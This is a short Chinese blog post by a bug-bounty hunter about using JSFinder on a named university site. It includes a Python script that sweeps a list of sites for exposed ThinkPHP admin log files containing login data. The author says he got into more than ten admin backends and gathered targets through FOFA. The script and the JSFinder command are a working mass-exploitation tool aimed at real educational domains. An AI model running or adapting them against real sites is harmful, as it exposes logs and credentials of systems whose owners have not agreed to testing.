题记
明天我的服务器就要到期了,留下了贫穷的泪水。虽然没有最大化的利用,但还是给我的学习带来了不小的帮助。明天开始就要一步步完成我另一部分计划了,实操骚姿势加总结一下top10漏洞等基础知识。反思一下为啥人家一挖就是0day,我只能看着眼红。真想要同济大学的证书啊,羡慕啊。
这几天沉迷挖洞,进个10多个后台,结果补天就给我过了一个,哎,伤不起啊。
参考链接
真香系列-JSFinder实用改造:http://mp.weixin.qq.com/s/naf-A-E9KdK_AipZ1bznOA
我是如何挖到edusrc年度第一的 手把手教挖洞系列 (一):http://mp.weixin.qq.com/s?__biz=MzU1NDU1NTI5Nw==&mid=2247483753&idx=1&sn=2ae8a5c5c6042b049dfeaf605cb664c6&chksm=fbe083a7cc970ab164b25cd4e9e3d7206ea2428bb098b4356b63e9f64ea60d0c9a310245df02&mpshare=1&scene=24&srcid=0124yxK8ESPKiqEdJ94MT4h5&sharer_sharetime=1611470713604&sharer_shareid=61895cb05812503585e8ba6e6fde4aa9#rd
JSFinder.exe使用
下载下来,cmd运行下面命令
JSFinder.exe -u http://study.tongji.edu.cn -v -html tongji
看着还是挺香的。
url批量验证脚本
使用情况:当发现一个edu的0day可以把edu链接存起来批量刷。
import requests file = open('edu.txt','r') number = file.readlines() for i in number: i = i.rstrip() i = str(i) try: url = 'http://' + i + "/Application/Runtime/Logs/Admin/20_12_30.log" r = requests.get(url, timeout=1) r.encoding = r.apparent_encoding HtmlText = r.text if 'login' in HtmlText: print(url) else: pass except: pass
edu.txt里面放可能存在漏洞的网址,不限于edu。
以我最近奋战的一丢丢thinkphp站点举例。这里插一句,哎,穷孩子只能在fofa找5页链接,我回头一定要买个会员,fafo搜集工具用到爽,我也要站起来了。
运行脚本发现链接。
验证成功。
后记
本来打算只写jsfinder的,后来觉得太少了加了一些,哈哈哈,最近挖洞挖的两眼昏花,还停不下来,有种不甘心,哎,互联网这座大山会给我们带来什么。我们不能盲目的排斥工具,工具确实给我们带来了很大的方便。社会的发展代表着生产方式的进步,网安的进步当然也离不开工具,我们要在基础保障的情况下,发展我们的工具。